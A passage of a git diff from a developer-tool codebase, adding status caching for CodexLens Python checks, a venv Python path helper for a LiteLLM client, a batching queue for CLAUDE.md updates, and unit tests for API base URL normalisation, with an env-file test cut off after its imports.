stdio: ['ignore', 'pipe', 'pipe'],
|
||||
timeout: 10000,
|
||||
});
|
||||
@@ -192,29 +209,54 @@ async function checkVenvStatus(force = false): Promise<ReadyStatus> {
|
||||
}
|
||||
// Cache the result
|
||||
venvStatusCache = { status: result, timestamp: Date.now() };
|
||||
console.log(`[PERF][CodexLens] checkVenvStatus Python spawn: ${Date.now() - spawnStart}ms | TOTAL: ${Date.now() - funcStart}ms | ready: ${result.ready}`);
|
||||
resolve(result);
|
||||
});
|
||||
|
||||
child.on('error', (err) => {
|
||||
const result = { ready: false, error: `Failed to check venv: ${err.message}` };
|
||||
venvStatusCache = { status: result, timestamp: Date.now() };
|
||||
console.log(`[PERF][CodexLens] checkVenvStatus ERROR: ${Date.now() - funcStart}ms`);
|
||||
resolve(result);
|
||||
});
|
||||
});
|
||||
}
|
||||
|
||||
/**
|
||||
* Clear semantic status cache (call after install/uninstall operations)
|
||||
*/
|
||||
function clearSemanticStatusCache(): void {
|
||||
semanticStatusCache = null;
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if semantic search dependencies are installed
|
||||
* @param force - Force refresh cache (default: false)
|
||||
* @returns Semantic status
|
||||
*/
|
||||
async function checkSemanticStatus(): Promise<SemanticStatus> {
|
||||
async function checkSemanticStatus(force = false): Promise<SemanticStatus> {
|
||||
const funcStart = Date.now();
|
||||
console.log('[PERF][CodexLens] checkSemanticStatus START');
|
||||
|
||||
// Use cached result if available and not expired
|
||||
if (!force && semanticStatusCache && (Date.now() - semanticStatusCache.timestamp < SEMANTIC_STATUS_TTL)) {
|
||||
console.log(`[PERF][CodexLens] checkSemanticStatus CACHE HIT: ${Date.now() - funcStart}ms`);
|
||||
return semanticStatusCache.status;
|
||||
}
|
||||
|
||||
// First check if CodexLens is installed
|
||||
const venvStatus = await checkVenvStatus();
|
||||
if (!venvStatus.ready) {
|
||||
return { available: false, error: 'CodexLens not installed' };
|
||||
const result: SemanticStatus = { available: false, error: 'CodexLens not installed' };
|
||||
semanticStatusCache = { status: result, timestamp: Date.now() };
|
||||
console.log(`[PERF][CodexLens] checkSemanticStatus (no venv): ${Date.now() - funcStart}ms`);
|
||||
return result;
|
||||
}
|
||||
|
||||
// Check semantic module availability and accelerator info
|
||||
const spawnStart = Date.now();
|
||||
console.log('[PERF][CodexLens] checkSemanticStatus spawning Python...');
|
||||
|
||||
return new Promise((resolve) => {
|
||||
const checkCode = `
|
||||
import sys
|
||||
@@ -274,21 +316,31 @@ except Exception as e:
|
||||
const output = stdout.trim();
|
||||
try {
|
||||
const result = JSON.parse(output);
|
||||
resolve({
|
||||
console.log(`[PERF][CodexLens] checkSemanticStatus Python spawn: ${Date.now() - spawnStart}ms | TOTAL: ${Date.now() - funcStart}ms | available: ${result.available}`);
|
||||
const status: SemanticStatus = {
|
||||
available: result.available || false,
|
||||
backend: result.backend,
|
||||
accelerator: result.accelerator || 'CPU',
|
||||
providers: result.providers || [],
|
||||
litellmAvailable: result.litellm_available || false,
|
||||
error: result.error
|
||||
});
|
||||
};
|
||||
// Cache the result
|
||||
semanticStatusCache = { status, timestamp: Date.now() };
|
||||
resolve(status);
|
||||
} catch {
|
||||
resolve({ available: false, error: output || stderr || 'Unknown error' });
|
||||
console.log(`[PERF][CodexLens] checkSemanticStatus PARSE ERROR: ${Date.now() - funcStart}ms`);
|
||||
const errorStatus: SemanticStatus = { available: false, error: output || stderr || 'Unknown error' };
|
||||
semanticStatusCache = { status: errorStatus, timestamp: Date.now() };
|
||||
resolve(errorStatus);
|
||||
}
|
||||
});
|
||||
|
||||
child.on('error', (err) => {
|
||||
resolve({ available: false, error: `Check failed: ${err.message}` });
|
||||
console.log(`[PERF][CodexLens] checkSemanticStatus ERROR: ${Date.now() - funcStart}ms`);
|
||||
const errorStatus: SemanticStatus = { available: false, error: `Check failed: ${err.message}` };
|
||||
semanticStatusCache = { status: errorStatus, timestamp: Date.now() };
|
||||
resolve(errorStatus);
|
||||
});
|
||||
});
|
||||
}
|
||||
@@ -583,6 +635,7 @@ async function bootstrapWithUv(gpuMode: GpuMode = 'cpu'): Promise<BootstrapResul
|
||||
|
||||
// Clear cache after successful installation
|
||||
clearVenvStatusCache();
|
||||
clearSemanticStatusCache();
|
||||
console.log(`[CodexLens] Bootstrap with UV complete (${gpuMode} mode)`);
|
||||
return { success: true, message: `Installed with UV (${gpuMode} mode)` };
|
||||
}
|
||||
@@ -878,6 +931,7 @@ async function bootstrapVenv(): Promise<BootstrapResult> {
|
||||
|
||||
// Clear cache after successful installation
|
||||
clearVenvStatusCache();
|
||||
clearSemanticStatusCache();
|
||||
return { success: true };
|
||||
} catch (err) {
|
||||
return { success: false, error: `Failed to install codexlens: ${(err as Error).message}` };
|
||||
@@ -1631,6 +1685,7 @@ async function uninstallCodexLens(): Promise<BootstrapResult> {
|
||||
bootstrapChecked = false;
|
||||
bootstrapReady = false;
|
||||
clearVenvStatusCache();
|
||||
clearSemanticStatusCache();
|
||||
|
||||
console.log('[CodexLens] CodexLens uninstalled successfully');
|
||||
return { success: true, message: 'CodexLens uninstalled successfully' };
|
||||
|
||||
@@ -30,6 +30,7 @@ import type { ProgressInfo } from './codex-lens.js';
|
||||
import { uiGeneratePreviewTool } from './ui-generate-preview.js';
|
||||
import { uiInstantiatePrototypesTool } from './ui-instantiate-prototypes.js';
|
||||
import { updateModuleClaudeTool } from './update-module-claude.js';
|
||||
import { memoryQueueTool } from './memory-update-queue.js';
|
||||
|
||||
interface LegacyTool {
|
||||
name: string;
|
||||
@@ -366,6 +367,7 @@ registerTool(toLegacyTool(skillContextLoaderMod));
|
||||
registerTool(uiGeneratePreviewTool);
|
||||
registerTool(uiInstantiatePrototypesTool);
|
||||
registerTool(updateModuleClaudeTool);
|
||||
registerTool(memoryQueueTool);
|
||||
|
||||
// Export for external tool registration
|
||||
export { registerTool };
|
||||
|
||||
@@ -10,14 +10,36 @@
|
||||
*/
|
||||
|
||||
import { spawn } from 'child_process';
|
||||
import { promisify } from 'util';
|
||||
import { existsSync } from 'fs';
|
||||
import { join } from 'path';
|
||||
import { homedir } from 'os';
|
||||
|
||||
export interface LiteLLMConfig {
|
||||
pythonPath?: string; // Default 'python'
|
||||
pythonPath?: string; // Default: CodexLens venv Python
|
||||
configPath?: string; // Configuration file path
|
||||
timeout?: number; // Default 60000ms
|
||||
}
|
||||
|
||||
// Platform-specific constants for CodexLens venv
|
||||
const IS_WINDOWS = process.platform === 'win32';
|
||||
const CODEXLENS_VENV = join(homedir(), '.codexlens', 'venv');
|
||||
const VENV_BIN_DIR = IS_WINDOWS ? 'Scripts' : 'bin';
|
||||
const PYTHON_EXECUTABLE = IS_WINDOWS ? 'python.exe' : 'python';
|
||||
|
||||
/**
|
||||
* Get the Python path from CodexLens venv
|
||||
* Falls back to system 'python' if venv doesn't exist
|
||||
* @returns Path to Python executable
|
||||
*/
|
||||
export function getCodexLensVenvPython(): string {
|
||||
const venvPython = join(CODEXLENS_VENV, VENV_BIN_DIR, PYTHON_EXECUTABLE);
|
||||
if (existsSync(venvPython)) {
|
||||
return venvPython;
|
||||
}
|
||||
// Fallback to system Python if venv not available
|
||||
return 'python';
|
||||
}
|
||||
|
||||
export interface ChatMessage {
|
||||
role: 'system' | 'user' | 'assistant';
|
||||
content: string;
|
||||
@@ -51,7 +73,7 @@ export class LiteLLMClient {
|
||||
private timeout: number;
|
||||
|
||||
constructor(config: LiteLLMConfig = {}) {
|
||||
this.pythonPath = config.pythonPath || 'python';
|
||||
this.pythonPath = config.pythonPath || getCodexLensVenvPython();
|
||||
this.configPath = config.configPath;
|
||||
this.timeout = config.timeout || 60000;
|
||||
}
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
* Integrates with context-cache for file packing and LiteLLM client for API calls
|
||||
*/
|
||||
|
||||
import { getLiteLLMClient } from './litellm-client.js';
|
||||
import { getLiteLLMClient, getCodexLensVenvPython } from './litellm-client.js';
|
||||
import { handler as contextCacheHandler } from './context-cache.js';
|
||||
import {
|
||||
findEndpointById,
|
||||
@@ -179,7 +179,7 @@ export async function executeLiteLLMEndpoint(
|
||||
}
|
||||
|
||||
const client = getLiteLLMClient({
|
||||
pythonPath: 'python',
|
||||
pythonPath: getCodexLensVenvPython(),
|
||||
timeout: 120000, // 2 minutes
|
||||
});
|
||||
|
||||
|
||||
499
ccw/src/tools/memory-update-queue.js
Normal file
@@ -0,0 +1,499 @@
|
||||
/**
|
||||
* Memory Update Queue Tool
|
||||
* Queue mechanism for batching CLAUDE.md updates
|
||||
*
|
||||
* Configuration:
|
||||
* - Threshold: 5 paths trigger update
|
||||
* - Timeout: 5 minutes auto-trigger
|
||||
* - Storage: ~/.claude/.memory-queue.json
|
||||
* - Deduplication: Same path only kept once
|
||||
*/
|
||||
|
||||
import { existsSync, readFileSync, writeFileSync, mkdirSync } from 'fs';
|
||||
import { join, dirname, resolve } from 'path';
|
||||
import { homedir } from 'os';
|
||||
|
||||
// Default configuration (overridable via the `config` key persisted in the queue file)
const DEFAULT_THRESHOLD = 5; // queued paths that trigger an automatic flush
const DEFAULT_TIMEOUT_SECONDS = 300; // 5 minutes auto-flush window
// Persistent queue location, shared across all processes of this user
const QUEUE_FILE_PATH = join(homedir(), '.claude', '.memory-queue.json');
|
||||
|
||||
/**
 * Read queue configuration from the queue file, falling back to defaults
 * when the file is missing, unreadable, or lacks a `config` section.
 * @returns {{ threshold: number, timeoutMs: number }}
 */
function getQueueConfig() {
  const defaults = {
    threshold: DEFAULT_THRESHOLD,
    timeoutMs: DEFAULT_TIMEOUT_SECONDS * 1000
  };

  try {
    if (!existsSync(QUEUE_FILE_PATH)) {
      return defaults;
    }
    const stored = JSON.parse(readFileSync(QUEUE_FILE_PATH, 'utf8'));
    return {
      threshold: stored.config?.threshold || DEFAULT_THRESHOLD,
      timeoutMs: (stored.config?.timeout || DEFAULT_TIMEOUT_SECONDS) * 1000
    };
  } catch (e) {
    // Corrupt queue file: silently fall back to defaults
    return defaults;
  }
}
|
||||
|
||||
// In-memory timer handle for the current process only; cross-process
// persistence of the flush deadline is tracked via the queue file's createdAt
let scheduledTimeoutId = null;
|
||||
|
||||
/**
 * Create the parent directory of `filePath` if it does not exist yet.
 * @param {string} filePath - File whose parent directory must exist
 */
function ensureDir(filePath) {
  const parent = dirname(filePath);
  if (existsSync(parent)) return;
  mkdirSync(parent, { recursive: true });
}
|
||||
|
||||
/**
 * Load the persisted queue from disk. A missing, malformed, or unreadable
 * file yields an empty queue rather than throwing.
 * @returns {{ items: Array<{path: string, tool: string, strategy: string, addedAt: string}>, createdAt: string | null, config: { threshold: number, timeout: number } | null }}
 */
function loadQueue() {
  const empty = { items: [], createdAt: null, config: null };
  try {
    if (!existsSync(QUEUE_FILE_PATH)) {
      return empty;
    }
    const data = JSON.parse(readFileSync(QUEUE_FILE_PATH, 'utf8'));
    return {
      items: Array.isArray(data.items) ? data.items : [],
      createdAt: data.createdAt || null,
      config: data.config || null
    };
  } catch (e) {
    console.error('[MemoryQueue] Failed to load queue:', e.message);
    return empty;
  }
}
|
||||
|
||||
/**
 * Persist the queue to disk as pretty-printed JSON, creating the parent
 * directory on demand. Write failures are logged and rethrown.
 * @param {{ items: Array<{path: string, tool: string, strategy: string, addedAt: string}>, createdAt: string | null }} data
 */
function saveQueue(data) {
  try {
    ensureDir(QUEUE_FILE_PATH);
    const serialized = JSON.stringify(data, null, 2);
    writeFileSync(QUEUE_FILE_PATH, serialized, 'utf8');
  } catch (e) {
    console.error('[MemoryQueue] Failed to save queue:', e.message);
    throw e;
  }
}
|
||||
|
||||
/**
 * Canonicalize a path for duplicate detection: make it absolute, convert
 * backslashes to forward slashes, and lower-case it (handles Windows/Unix
 * differences).
 * @param {string} p
 * @returns {string}
 */
function normalizePath(p) {
  const absolute = resolve(p);
  return absolute.split('\\').join('/').toLowerCase();
}
|
||||
|
||||
/**
 * Enqueue a module path for a batched CLAUDE.md update, deduplicating by
 * normalized path. Re-adding an already-queued path refreshes its metadata
 * instead of creating a second entry.
 * @param {string} path - Module path to update
 * @param {{ tool?: string, strategy?: string }} options
 * @returns {{ queued: boolean, queueSize: number, willFlush: boolean, message: string }}
 */
function addToQueue(path, options = {}) {
  const { tool = 'gemini', strategy = 'single-layer' } = options;
  const queue = loadQueue();
  const config = getQueueConfig();
  const target = normalizePath(path);
  const now = new Date().toISOString();

  // Deduplicate: an existing entry only gets its metadata refreshed
  const existing = queue.items.find(item => normalizePath(item.path) === target);
  if (existing) {
    existing.addedAt = now;
    existing.tool = tool;
    existing.strategy = strategy;
    saveQueue(queue);

    return {
      queued: false,
      queueSize: queue.items.length,
      willFlush: queue.items.length >= config.threshold,
      message: `Path already in queue (updated): ${path}`
    };
  }

  queue.items.push({ path, tool, strategy, addedAt: now });

  // The first queued item opens the timeout window
  queue.createdAt = queue.createdAt || now;

  saveQueue(queue);

  const willFlush = queue.items.length >= config.threshold;

  // Arm (or lazily re-check) the auto-flush timer
  scheduleTimeout();

  return {
    queued: true,
    queueSize: queue.items.length,
    willFlush,
    message: willFlush
      ? `Queue threshold reached (${queue.items.length}/${config.threshold}), will flush`
      : `Added to queue (${queue.items.length}/${config.threshold})`
  };
}
|
||||
|
||||
/**
 * Report the queue's current state.
 * @returns {{ queueSize: number, threshold: number, items: Array, timeoutMs: number, timeoutSeconds: number, timeUntilTimeout: number | null, createdAt: string | null }}
 */
function getQueueStatus() {
  const queue = loadQueue();
  const config = getQueueConfig();

  // Remaining time before auto-flush; null when the queue is empty
  let timeUntilTimeout = null;
  if (queue.createdAt && queue.items.length > 0) {
    const elapsed = Date.now() - new Date(queue.createdAt).getTime();
    timeUntilTimeout = Math.max(0, config.timeoutMs - elapsed);
  }

  return {
    queueSize: queue.items.length,
    threshold: config.threshold,
    items: queue.items,
    timeoutMs: config.timeoutMs,
    timeoutSeconds: config.timeoutMs / 1000,
    timeUntilTimeout,
    createdAt: queue.createdAt
  };
}
|
||||
|
||||
/**
 * Configure queue settings and persist them in the queue file.
 * @param {{ threshold?: number, timeout?: number }} settings - threshold in
 *   items (1-20), timeout in seconds (60-1800); omitted fields keep their
 *   current values
 * @returns {{ success: boolean, config: { threshold: number, timeout: number }, message: string }}
 * @throws {Error} When a supplied value is outside its valid range
 */
function configureQueue(settings) {
  const queue = loadQueue();
  const currentConfig = getQueueConfig();

  // Use ?? instead of || so an explicit (invalid) falsy value like 0 reaches
  // validation and is rejected, rather than silently keeping the old value
  const newConfig = {
    threshold: settings.threshold ?? currentConfig.threshold,
    timeout: settings.timeout ?? (currentConfig.timeoutMs / 1000)
  };

  // Validate
  if (newConfig.threshold < 1 || newConfig.threshold > 20) {
    throw new Error('Threshold must be between 1 and 20');
  }
  if (newConfig.timeout < 60 || newConfig.timeout > 1800) {
    throw new Error('Timeout must be between 60 and 1800 seconds');
  }

  queue.config = newConfig;
  saveQueue(queue);

  return {
    success: true,
    config: newConfig,
    message: `Queue configured: threshold=${newConfig.threshold}, timeout=${newConfig.timeout}s`
  };
}
|
||||
|
||||
/**
 * Flush queue - execute batch update.
 *
 * Drains every queued path by invoking the update-module-claude tool on each
 * item, one at a time, then resets the queue file. Individual item failures
 * are collected into `errors` rather than aborting the batch.
 * @returns {Promise<{ success: boolean, processed: number, results: Array, errors: Array, message: string }>}
 */
async function flushQueue() {
  const queue = loadQueue();

  if (queue.items.length === 0) {
    return {
      success: true,
      processed: 0,
      results: [],
      errors: [],
      message: 'Queue is empty'
    };
  }

  // Clear timeout so the in-process timer cannot trigger a second flush
  clearScheduledTimeout();

  // Import update_module_claude dynamically to avoid circular deps
  const { updateModuleClaudeTool } = await import('./update-module-claude.js');

  const results = [];
  const errors = [];

  // Group by tool and strategy for efficiency
  const groups = new Map();
  for (const item of queue.items) {
    const key = `${item.tool}:${item.strategy}`;
    if (!groups.has(key)) {
      groups.set(key, []);
    }
    groups.get(key).push(item);
  }

  // Process each group; items within a group run sequentially (awaited)
  for (const [key, items] of groups) {
    const [tool, strategy] = key.split(':');
    console.log(`[MemoryQueue] Processing ${items.length} items with ${tool}/${strategy}`);

    for (const item of items) {
      try {
        const result = await updateModuleClaudeTool.execute({
          path: item.path,
          tool: item.tool,
          strategy: item.strategy
        });

        // Anything except an explicit `success: false` counts as success
        results.push({
          path: item.path,
          success: result.success !== false,
          result
        });
      } catch (e) {
        // Record the failure and continue with the remaining items
        console.error(`[MemoryQueue] Failed to update ${item.path}:`, e.message);
        errors.push({
          path: item.path,
          error: e.message
        });
      }
    }
  }

  // Clear queue after processing; the local `queue` still holds the pre-flush
  // snapshot, so `processed` below reflects the drained item count
  saveQueue({ items: [], createdAt: null });

  return {
    success: errors.length === 0,
    processed: queue.items.length,
    results,
    errors,
    message: `Processed ${results.length} items, ${errors.length} errors`
  };
}
|
||||
|
||||
/**
 * Schedule timeout for auto-flush.
 *
 * The queue file's `createdAt` timestamp is the source of truth for the
 * deadline, so it survives process restarts. An in-memory timer is armed
 * only as a best-effort trigger for the current process; other processes
 * catch an expired deadline lazily on their next add/status call.
 */
function scheduleTimeout() {
  // We use file-based timeout tracking for persistence across process restarts
  // The actual timeout check happens on next add/status call
  const queue = loadQueue();
  const config = getQueueConfig();

  // Nothing to schedule for an empty queue
  if (!queue.createdAt || queue.items.length === 0) {
    return;
  }

  const createdTime = new Date(queue.createdAt).getTime();
  const elapsed = Date.now() - createdTime;

  if (elapsed >= config.timeoutMs) {
    // Timeout already exceeded, should flush
    console.log('[MemoryQueue] Timeout exceeded, auto-flushing');
    // Don't await here to avoid blocking
    flushQueue().catch(e => {
      console.error('[MemoryQueue] Auto-flush failed:', e.message);
    });
  } else if (!scheduledTimeoutId) {
    // Schedule in-memory timeout for current process
    const remaining = config.timeoutMs - elapsed;
    scheduledTimeoutId = setTimeout(() => {
      scheduledTimeoutId = null;
      // Re-read the queue at fire time; it may have been flushed already
      const currentQueue = loadQueue();
      if (currentQueue.items.length > 0) {
        console.log('[MemoryQueue] Timeout reached, auto-flushing');
        flushQueue().catch(e => {
          console.error('[MemoryQueue] Auto-flush failed:', e.message);
        });
      }
    }, remaining);

    // Prevent timeout from keeping process alive
    if (scheduledTimeoutId.unref) {
      scheduledTimeoutId.unref();
    }
  }
}
|
||||
|
||||
/**
|
||||
* Clear scheduled timeout
|
||||
*/
|
||||
function clearScheduledTimeout() {
|
||||
if (scheduledTimeoutId) {
|
||||
clearTimeout(scheduledTimeoutId);
|
||||
scheduledTimeoutId = null;
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if timeout has expired and auto-flush if needed
|
||||
* @returns {Promise<{ expired: boolean, flushed: boolean, result?: object }>}
|
||||
*/
|
||||
async function checkTimeout() {
|
||||
const queue = loadQueue();
|
||||
const config = getQueueConfig();
|
||||
|
||||
if (!queue.createdAt || queue.items.length === 0) {
|
||||
return { expired: false, flushed: false };
|
||||
}
|
||||
|
||||
const createdTime = new Date(queue.createdAt).getTime();
|
||||
const elapsed = Date.now() - createdTime;
|
||||
|
||||
if (elapsed >= config.timeoutMs) {
|
||||
console.log('[MemoryQueue] Timeout expired, triggering flush');
|
||||
const result = await flushQueue();
|
||||
return { expired: true, flushed: true, result };
|
||||
}
|
||||
|
||||
return { expired: false, flushed: false };
|
||||
}
|
||||
|
||||
/**
|
||||
* Main execute function for tool interface
|
||||
* @param {Record<string, unknown>} params
|
||||
* @returns {Promise<unknown>}
|
||||
*/
|
||||
async function execute(params) {
|
||||
const { action, path, tool = 'gemini', strategy = 'single-layer', threshold, timeout } = params;
|
||||
|
||||
switch (action) {
|
||||
case 'add':
|
||||
if (!path) {
|
||||
throw new Error('Parameter "path" is required for add action');
|
||||
}
|
||||
// Check timeout first
|
||||
const timeoutCheck = await checkTimeout();
|
||||
if (timeoutCheck.flushed) {
|
||||
// Queue was flushed due to timeout, add to fresh queue
|
||||
const result = addToQueue(path, { tool, strategy });
|
||||
return {
|
||||
...result,
|
||||
timeoutFlushed: true,
|
||||
flushResult: timeoutCheck.result
|
||||
};
|
||||
}
|
||||
|
||||
const addResult = addToQueue(path, { tool, strategy });
|
||||
|
||||
// Auto-flush if threshold reached
|
||||
if (addResult.willFlush) {
|
||||
const flushResult = await flushQueue();
|
||||
return {
|
||||
...addResult,
|
||||
flushed: true,
|
||||
flushResult
|
||||
};
|
||||
}
|
||||
|
||||
return addResult;
|
||||
|
||||
case 'status':
|
||||
// Check timeout first
|
||||
await checkTimeout();
|
||||
return getQueueStatus();
|
||||
|
||||
case 'flush':
|
||||
return await flushQueue();
|
||||
|
||||
case 'configure':
|
||||
return configureQueue({ threshold, timeout });
|
||||
|
||||
default:
|
||||
throw new Error(`Unknown action: ${action}. Valid actions: add, status, flush, configure`);
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Tool Definition
|
||||
*/
|
||||
export const memoryQueueTool = {
|
||||
name: 'memory_queue',
|
||||
description: `Memory update queue management. Batches CLAUDE.md updates for efficiency.
|
||||
|
||||
Actions:
|
||||
- add: Add path to queue (auto-flushes at configured threshold/timeout)
|
||||
- status: Get queue status and configuration
|
||||
- flush: Immediately execute all queued updates
|
||||
- configure: Set threshold and timeout settings`,
|
||||
parameters: {
|
||||
type: 'object',
|
||||
properties: {
|
||||
action: {
|
||||
type: 'string',
|
||||
enum: ['add', 'status', 'flush', 'configure'],
|
||||
description: 'Queue action to perform'
|
||||
},
|
||||
path: {
|
||||
type: 'string',
|
||||
description: 'Module directory path (required for add action)'
|
||||
},
|
||||
threshold: {
|
||||
type: 'number',
|
||||
description: 'Number of paths to trigger flush (1-20, for configure action)',
|
||||
minimum: 1,
|
||||
maximum: 20
|
||||
},
|
||||
timeout: {
|
||||
type: 'number',
|
||||
description: 'Timeout in seconds to trigger flush (60-1800, for configure action)',
|
||||
minimum: 60,
|
||||
maximum: 1800
|
||||
},
|
||||
tool: {
|
||||
type: 'string',
|
||||
enum: ['gemini', 'qwen', 'codex'],
|
||||
description: 'CLI tool to use (default: gemini)',
|
||||
default: 'gemini'
|
||||
},
|
||||
strategy: {
|
||||
type: 'string',
|
||||
enum: ['single-layer', 'multi-layer'],
|
||||
description: 'Update strategy (default: single-layer)',
|
||||
default: 'single-layer'
|
||||
}
|
||||
},
|
||||
required: ['action']
|
||||
},
|
||||
execute
|
||||
};
|
||||
|
||||
// Export individual functions for direct use
|
||||
export {
|
||||
loadQueue,
|
||||
saveQueue,
|
||||
addToQueue,
|
||||
getQueueStatus,
|
||||
flushQueue,
|
||||
configureQueue,
|
||||
scheduleTimeout,
|
||||
clearScheduledTimeout,
|
||||
checkTimeout,
|
||||
DEFAULT_THRESHOLD,
|
||||
DEFAULT_TIMEOUT_SECONDS,
|
||||
QUEUE_FILE_PATH
|
||||
};
|
||||
165
ccw/tests/api-key-tester.test.ts
Normal file
@@ -0,0 +1,165 @@
|
||||
/**
|
||||
* Unit tests for API Key Tester service (ccw/src/core/services/api-key-tester.ts)
|
||||
*
|
||||
* Tests URL construction logic, version suffix detection, and trailing slash handling.
|
||||
* Uses Node's built-in test runner (node:test).
|
||||
*/
|
||||
|
||||
import { describe, it } from 'node:test';
|
||||
import assert from 'node:assert/strict';
|
||||
|
||||
// Import functions that don't require fetch
|
||||
import { validateApiBaseUrl, getDefaultApiBase } from '../src/core/services/api-key-tester.js';
|
||||
|
||||
describe('API Key Tester', () => {
|
||||
describe('validateApiBaseUrl', () => {
|
||||
it('should accept valid HTTPS URLs', () => {
|
||||
const result = validateApiBaseUrl('https://api.openai.com/v1');
|
||||
assert.equal(result.valid, true);
|
||||
});
|
||||
|
||||
it('should accept valid HTTP URLs (for local development)', () => {
|
||||
const result = validateApiBaseUrl('http://localhost:8080');
|
||||
assert.equal(result.valid, true);
|
||||
});
|
||||
|
||||
it('should reject non-HTTP protocols', () => {
|
||||
const result = validateApiBaseUrl('ftp://example.com');
|
||||
assert.equal(result.valid, false);
|
||||
assert.equal(result.error, 'URL must use HTTP or HTTPS protocol');
|
||||
});
|
||||
|
||||
it('should reject invalid URL format', () => {
|
||||
const result = validateApiBaseUrl('not-a-url');
|
||||
assert.equal(result.valid, false);
|
||||
assert.equal(result.error, 'Invalid URL format');
|
||||
});
|
||||
});
|
||||
|
||||
describe('getDefaultApiBase', () => {
|
||||
it('should return OpenAI default for openai provider', () => {
|
||||
assert.equal(getDefaultApiBase('openai'), 'https://api.openai.com/v1');
|
||||
});
|
||||
|
||||
it('should return Anthropic default for anthropic provider', () => {
|
||||
assert.equal(getDefaultApiBase('anthropic'), 'https://api.anthropic.com/v1');
|
||||
});
|
||||
|
||||
it('should return OpenAI default for custom provider', () => {
|
||||
assert.equal(getDefaultApiBase('custom'), 'https://api.openai.com/v1');
|
||||
});
|
||||
});
|
||||
|
||||
describe('URL Normalization Logic (Issue #70 fix verification)', () => {
|
||||
// Test the regex pattern used in testApiKeyConnection
|
||||
const normalizeUrl = (url: string) => url.replace(/\/+$/, '');
|
||||
const hasVersionSuffix = (url: string) => /\/v\d+$/.test(url);
|
||||
|
||||
describe('Trailing slash removal', () => {
|
||||
it('should remove single trailing slash', () => {
|
||||
assert.equal(normalizeUrl('https://api.openai.com/v1/'), 'https://api.openai.com/v1');
|
||||
});
|
||||
|
||||
it('should remove multiple trailing slashes', () => {
|
||||
assert.equal(normalizeUrl('https://api.openai.com/v1///'), 'https://api.openai.com/v1');
|
||||
});
|
||||
|
||||
it('should not modify URL without trailing slash', () => {
|
||||
assert.equal(normalizeUrl('https://api.openai.com/v1'), 'https://api.openai.com/v1');
|
||||
});
|
||||
});
|
||||
|
||||
describe('Version suffix detection', () => {
|
||||
it('should detect /v1 suffix', () => {
|
||||
assert.equal(hasVersionSuffix('https://api.openai.com/v1'), true);
|
||||
});
|
||||
|
||||
it('should detect /v2 suffix', () => {
|
||||
assert.equal(hasVersionSuffix('https://api.custom.com/v2'), true);
|
||||
});
|
||||
|
||||
it('should detect /v4 suffix (z.ai style)', () => {
|
||||
assert.equal(hasVersionSuffix('https://api.z.ai/api/coding/paas/v4'), true);
|
||||
});
|
||||
|
||||
it('should NOT detect version when URL has no version suffix', () => {
|
||||
assert.equal(hasVersionSuffix('http://localhost:8080'), false);
|
||||
});
|
||||
|
||||
it('should NOT detect version when followed by slash (before normalization)', () => {
|
||||
// After normalization, the slash should be removed
|
||||
assert.equal(hasVersionSuffix('https://api.openai.com/v1/'), false);
|
||||
assert.equal(hasVersionSuffix(normalizeUrl('https://api.openai.com/v1/')), true);
|
||||
});
|
||||
});
|
||||
|
||||
describe('URL construction verification', () => {
|
||||
const constructModelsUrl = (apiBase: string) => {
|
||||
const normalized = normalizeUrl(apiBase);
|
||||
return hasVersionSuffix(normalized) ? `${normalized}/models` : `${normalized}/v1/models`;
|
||||
};
|
||||
|
||||
it('should construct correct URL for https://api.openai.com/v1', () => {
|
||||
assert.equal(constructModelsUrl('https://api.openai.com/v1'), 'https://api.openai.com/v1/models');
|
||||
});
|
||||
|
||||
it('should construct correct URL for https://api.openai.com/v1/ (with trailing slash)', () => {
|
||||
assert.equal(constructModelsUrl('https://api.openai.com/v1/'), 'https://api.openai.com/v1/models');
|
||||
});
|
||||
|
||||
it('should construct correct URL for https://api.custom.com/v2', () => {
|
||||
assert.equal(constructModelsUrl('https://api.custom.com/v2'), 'https://api.custom.com/v2/models');
|
||||
});
|
||||
|
||||
it('should construct correct URL for https://api.custom.com/v2/ (with trailing slash)', () => {
|
||||
assert.equal(constructModelsUrl('https://api.custom.com/v2/'), 'https://api.custom.com/v2/models');
|
||||
});
|
||||
|
||||
it('should construct correct URL for https://api.z.ai/api/coding/paas/v4', () => {
|
||||
assert.equal(constructModelsUrl('https://api.z.ai/api/coding/paas/v4'), 'https://api.z.ai/api/coding/paas/v4/models');
|
||||
});
|
||||
|
||||
it('should add /v1 when no version suffix: http://localhost:8080', () => {
|
||||
assert.equal(constructModelsUrl('http://localhost:8080'), 'http://localhost:8080/v1/models');
|
||||
});
|
||||
|
||||
it('should add /v1 when no version suffix: https://api.custom.com', () => {
|
||||
assert.equal(constructModelsUrl('https://api.custom.com'), 'https://api.custom.com/v1/models');
|
||||
});
|
||||
|
||||
it('should NOT produce double slashes in any case', () => {
|
||||
const testCases = [
|
||||
'https://api.openai.com/v1/',
|
||||
'https://api.openai.com/v1//',
|
||||
'https://api.anthropic.com/v1/',
|
||||
'http://localhost:8080/',
|
||||
];
|
||||
|
||||
for (const url of testCases) {
|
||||
const result = constructModelsUrl(url);
|
||||
assert.ok(!result.includes('//models'), `Double slash found in: ${result} (from: ${url})`);
|
||||
}
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
describe('Anthropic URL construction', () => {
|
||||
const constructAnthropicUrl = (apiBase: string) => {
|
||||
const normalized = apiBase.replace(/\/+$/, '');
|
||||
return `${normalized}/models`;
|
||||
};
|
||||
|
||||
it('should construct correct Anthropic URL without trailing slash', () => {
|
||||
assert.equal(constructAnthropicUrl('https://api.anthropic.com/v1'), 'https://api.anthropic.com/v1/models');
|
||||
});
|
||||
|
||||
it('should construct correct Anthropic URL WITH trailing slash', () => {
|
||||
assert.equal(constructAnthropicUrl('https://api.anthropic.com/v1/'), 'https://api.anthropic.com/v1/models');
|
||||
});
|
||||
|
||||
it('should NOT produce double slashes', () => {
|
||||
const result = constructAnthropicUrl('https://api.anthropic.com/v1//');
|
||||
assert.ok(!result.includes('//models'), `Double slash found in: ${result}`);
|
||||
});
|
||||
});
|
||||
});
|
||||
258
ccw/tests/cli-env-file.test.ts
Normal file
@@ -0,0 +1,258 @@
|
||||
/**
|
||||
* Unit tests for CLI env file loading mechanism
|
||||
*
|
||||
* Tests parseEnvFile and loadEnvFile functions without calling the actual CLI
|
||||
*/
|
||||
|
||||
import { describe, it, before, after } from 'node:test';
|
||||
import assert from 'node:assert/strict';
|
||||
